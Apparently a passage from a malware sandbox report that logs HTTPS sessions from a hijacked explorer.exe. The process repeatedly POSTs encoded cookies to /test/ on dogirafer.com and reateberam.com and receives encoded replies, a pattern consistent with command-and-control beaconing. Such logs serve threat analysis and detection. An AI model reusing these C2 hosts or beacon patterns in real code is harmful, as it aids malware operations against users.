                                                                  Cookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:27 UTC788INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPAyb2yxmj%2FtdhY4cI7JoI24DIcV3HLk%2Bb9gUBLNSK4bQ6RpaZpqf1CkDPfwhrMDg%2FWryufWwPDhkNVeyiUrUK1gLi5rhNbeLHRRmhd%2Fv%2B5oU8AvTlbmyHb4xiNoLOjQ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21734e0eebb6-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14007&min_rtt=13907&rtt_var=5287&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=209966&cwnd=32&unsent_bytes=0&cid=5aca874b8741a559&ts=1607&x=0"
                                                                  2024-12-02 17:45:27 UTC343INData Raw: 31 35 30 0d 0a 4d 79 6d 62 51 38 71 78 33 34 70 69 5a 68 6a 64 68 32 43 73 7a 48 52 48 4f 30 72 51 42 45 36 6f 61 66 36 7a 75 53 62 49 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 56 6d 4c 30 34 6f 63 35 75 4f 68 56 77 6d 44 37 53 36 75 4f 30 44 73 70 47 74 6f 73 78 52 37 69 6c 52 48 57 64 4f 36 59 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4c 46 38 30 77 42 65 7a 67 54 68 6f 59 5a 4c 66 44 66 48 68 68 34 59 4e 43 36 46 50 61 43 33 5a 41 68 55 6b 39 4d 56 30 41 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 50 66 42 61 51 70
                                                                  Data Ascii: 150MymbQ8qx34piZhjdh2CszHRHO0rQBE6oaf6zuSbIKRib7xuPoA21j4bUizVmL04oc5uOhVwmD7S6uO0DspGtosxR7ilRHWdO6Y+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzLF80wBezgThoYZLfDfHhh4YNC6FPaC3ZAhUk9MV0AcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZPfBaQp
                                                                  2024-12-02 17:45:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.550001104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:29 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:31 UTC791INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2VKnkmbrIXro8vboiQrFX0SmPcFH5F65oyn%2Fr6KGI6jb0%2FrQkCpmiszaKfpcULgEg%2Bm4qNyqO30tS16Z3T5jb25pnS%2F0s%2BwTDI4plLadjdpuAlG14GMTG%2B6KhLK%2F4AeM"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd218b291742fd-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1749&rtt_var=714&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1471774&cwnd=247&unsent_bytes=0&cid=a40c0605d0ab3b99&ts=1631&x=0"
                                                                  2024-12-02 17:45:31 UTC343INData Raw: 31 35 30 0d 0a 4f 53 6d 61 52 38 53 78 32 49 70 76 61 78 33 66 67 47 58 70 67 33 39 4f 4d 6b 7a 54 42 69 4c 43 62 76 75 77 74 79 2f 4b 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 49 6b 4d 69 65 4a 4c 69 37 46 6f 72 43 72 71 38 75 4b 52 47 73 5a 71 6f 70 73 73 33 37 6b 35 64 47 6d 64 4d 37 73 53 67 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6f 79 42 2b 72 67 4a 52 52 2b 61 62 48 47 65 6e 55 71 35 4d 74 50 35 6c 50 61 41 52 42 42 37 45 73 2f 4d 6c 38 41 50 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 52 51 51 70
                                                                  Data Ascii: 150OSmaR8Sx2Ipvax3fgGXpg39OMkzTBiLCbvuwty/KZ2mcphSGpB6yiJiVjA1pIkMieJLi7ForCrq8uKRGsZqopss37k5dGmdM7sSgfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcoyB+rgJRR+abHGenUq5MtP5lPaARBB7Es/Ml8APsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfRQQp
                                                                  2024-12-02 17:45:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.550002104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:32 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:34 UTC793INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F9VqhO1VuQaDoH1WUpLl%2FGS98rh5ogpLKLb%2Fl4C3GeZxnW9HVMonD%2BsjKcNKAyG6yahJ%2FQmgBseABiyjUBGfqL4Az3Xq0s%2Frqyet8XvufDWxujJm7uGkXaIy%2BItagERd"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd219e0db1ab1e-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=30481&min_rtt=14309&rtt_var=16461&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=204067&cwnd=32&unsent_bytes=0&cid=39119e3bc3a163f7&ts=1621&x=0"
                                                                  2024-12-02 17:45:34 UTC343INData Raw: 31 35 30 0d 0a 50 43 32 64 51 4d 47 79 33 49 70 6c 5a 42 2f 62 6a 47 4c 6f 67 33 39 48 4d 6b 6e 57 41 79 48 43 62 50 36 7a 74 79 2f 49 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 4a 6b 59 73 65 5a 4c 6c 37 46 77 71 44 4c 65 32 73 36 52 47 75 35 43 6f 70 38 6b 33 37 6b 35 64 48 57 42 50 36 63 4b 68 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 45 34 44 4f 33 6a 49 68 70 2b 62 37 4c 45 66 33 67 6b 35 63 74 44 37 31 72 56 43 68 39 46 37 45 77 39 4f 56 49 49 4f 49 72 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 57 51 4a
                                                                  Data Ascii: 150PC2dQMGy3IplZB/bjGLog39HMknWAyHCbP6zty/IYGmcphSGpB6yiJiVjA1vJkYseZLl7FwqDLe2s6RGu5Cop8k37k5dHWBP6cKhfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcE4DO3jIhp+b7LEf3gk5ctD71rVCh9F7Ew9OVIIOIrMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1WQJ
                                                                  2024-12-02 17:45:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.550003104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:36 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:37 UTC787INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPr0LOdrbeQwfVI1f6COcmptmE3iOdFxFmQW698pMaLeGjLwru%2FpSEBvMbF0juQPa%2Bp2F%2FXfbfmh94vf08nZ5dgRDD3X0l%2BXkH%2FLchvIlaKNHn2AEHkguOqE31fZf9g0"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21b38831433a-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=1701631&cwnd=241&unsent_bytes=0&cid=07d74bbd07e50989&ts=1621&x=0"
                                                                  2024-12-02 17:45:37 UTC343INData Raw: 31 35 30 0d 0a 4f 43 79 59 54 63 47 78 32 6f 70 6a 5a 68 76 59 68 47 48 69 67 33 39 48 4f 45 37 52 41 79 48 43 5a 2f 65 33 76 43 62 4f 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 4a 45 45 73 63 70 58 6b 37 46 73 69 44 4c 53 37 75 4b 64 47 73 70 57 6f 72 63 34 35 35 45 35 63 48 47 46 4e 37 38 4f 6f 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 41 77 42 4f 6a 6a 4b 42 52 2b 5a 4c 44 44 65 58 51 72 71 34 39 50 36 46 54 59 43 52 41 70 67 45 41 37 4d 31 30 4d 4f 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 35 51 54 35
                                                                  Data Ascii: 150OCyYTcGx2opjZhvYhGHig39HOE7RAyHCZ/e3vCbOYGmcphSGpB6yiJiVjA1qJEEscpXk7FsiDLS7uKdGspWorc455E5cHGFN78OofW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcAwBOjjKBR+ZLDDeXQrq49P6FTYCRApgEA7M10MO8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf5QT5
                                                                  2024-12-02 17:45:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.550004104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:39 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:41 UTC789INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l2JvCjHbQHhRa4qlUZ7DicwocyJ%2FjQuZc1tDkHelkFsjYiyDs5jf58qVWrRTR0g3Ei%2BqzbELbquGcqPEZReq1qz7A9c73fbBLU%2FffIpqZc47e%2BO71lKvL9E%2FukpYEztR"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21c79f90236b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=50749&min_rtt=3151&rtt_var=29575&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=926689&cwnd=172&unsent_bytes=0&cid=6c2fd9a841aa9f30&ts=1617&x=0"
                                                                  2024-12-02 17:45:41 UTC343INData Raw: 31 35 30 0d 0a 50 43 71 65 52 38 53 31 32 34 70 6c 5a 52 37 64 67 6d 58 68 67 33 4e 49 50 55 6a 56 41 69 54 43 61 50 75 36 76 43 44 45 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 49 30 41 73 63 35 66 6d 37 46 30 71 43 37 61 2b 75 4f 30 4d 74 5a 75 76 6f 4d 6f 33 67 69 4a 57 46 57 5a 4b 35 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 42 46 73 77 33 44 65 33 72 54 68 67 58 61 62 50 48 66 48 6c 68 34 6f 42 43 36 46 50 66 44 33 5a 48 69 6b 41 37 4d 56 38 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 76 35 58 52 35
                                                                  Data Ascii: 150PCqeR8S124plZR7dgmXhg3NIPUjVAiTCaPu6vCDEZmmcphSGpB6yiJiVjA1mI0Asc5fm7F0qC7a+uO0MtZuvoMo3giJWFWZK54+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzBFsw3De3rThgXabPHfHlh4oBC6FPfD3ZHikA7MV8BcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZNv5XR5
                                                                  2024-12-02 17:45:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.550006172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:43 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:44 UTC789INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hW2VT0Tf42kdRJpZYMvXgc9Ogag6TJ5vr7EUGGn2GwM82YWEwvU5kdORkG8ekEE58MyPWt4zo5NUSwBuV4MGP12zYxzGiPXhPaPaxryv0ohctwWWW%2B%2BBNnsjMABGZkbIMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21e11a06ebbd-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14188&min_rtt=14183&rtt_var=5329&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=205243&cwnd=32&unsent_bytes=0&cid=ed4390e4bed9a7ce&ts=810&x=0"
                                                                  2024-12-02 17:45:44 UTC343INData Raw: 31 35 30 0d 0a 50 79 2b 65 52 4d 43 79 32 49 70 76 59 42 54 64 6a 57 44 6a 67 33 52 48 4d 6b 6e 66 42 79 50 43 62 66 79 78 76 79 58 50 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 4a 55 34 72 65 5a 58 6f 37 46 30 67 43 72 75 2f 73 71 4a 47 74 70 65 76 70 4d 73 2f 36 45 35 58 48 6d 4e 45 37 4d 43 68 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 30 41 65 7a 6a 4a 78 56 2b 5a 4c 4c 43 66 6e 55 74 35 38 74 42 37 56 72 59 43 78 6c 4f 37 45 34 38 4e 56 34 4d 4e 6f 7a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 62 52 35
                                                                  Data Ascii: 150Py+eRMCy2IpvYBTdjWDjg3RHMknfByPCbfyxvyXPYmmcphSGpB6yiJiVjA1rJU4reZXo7F0gCru/sqJGtpevpMs/6E5XHmNE7MChfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kcw0AezjJxV+ZLLCfnUt58tB7VrYCxlO7E48NV4MNozMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1bR5
                                                                  2024-12-02 17:45:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.550007172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:45 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:46 UTC792INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2BVaHXXdmaymv0nt%2FeJxcYLThx7RI943WZAtScAcxpbXuLpoJqrnyNdSC6zvBG%2BafBBhEF3MGt2wW3L2SzG72PxzuYVc3JAnTwYjQonwponApyQZj7TWJIT8q03g5hSfHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21ef69beab2a-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=29426&min_rtt=13890&rtt_var=15883&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=210223&cwnd=32&unsent_bytes=0&cid=a5779f68228b3be9&ts=871&x=0"
                                                                  2024-12-02 17:45:46 UTC339INData Raw: 31 34 63 0d 0a 4d 79 71 55 52 63 71 31 30 59 70 68 59 78 7a 59 68 32 54 67 67 33 42 47 50 6b 2f 52 41 79 50 43 62 50 69 79 74 79 44 49 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 6f 4a 55 38 6f 66 4a 4b 4f 68 56 34 6b 44 4c 75 34 74 4f 30 43 73 5a 43 75 70 63 38 32 67 69 5a 56 48 47 64 45 37 4d 44 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 45 32 44 4f 33 6d 4a 48 4d 53 5a 62 62 47 63 6e 45 74 71 34 39 43 36 6c 4c 64 43 58 5a 45 69 6b 77 2b 4f 56 6f 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 2f 39 56 52 4a
                                                                  Data Ascii: 14cMyqURcq10YphYxzYh2Tgg3BGPk/RAyPCbPiytyDIKRib7xuPoA21j4bUizRoJU8ofJKOhV4kDLu4tO0CsZCupc82giZVHGdE7MDsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EME2DO3mJHMSZbbGcnEtq49C6lLdCXZEikw+OVoBcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/9VRJ
                                                                  2024-12-02 17:45:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.550008172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:48 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:48 UTC790INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n4Ker%2BpndsxtiGiXFJ4AU7TWiMtg%2FMa960yD5jHBseLoqxmgzdPvTWo2FVVuzcowoqZhB32H6FWRIARBxVyEH8yxKrsXdUdpJHStGvDNZqoRYtwZjv%2F677FWA8fYDbu6uQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21fcef705e6a-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1770&rtt_var=666&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1639528&cwnd=214&unsent_bytes=0&cid=44e4753bd2401a85&ts=749&x=0"
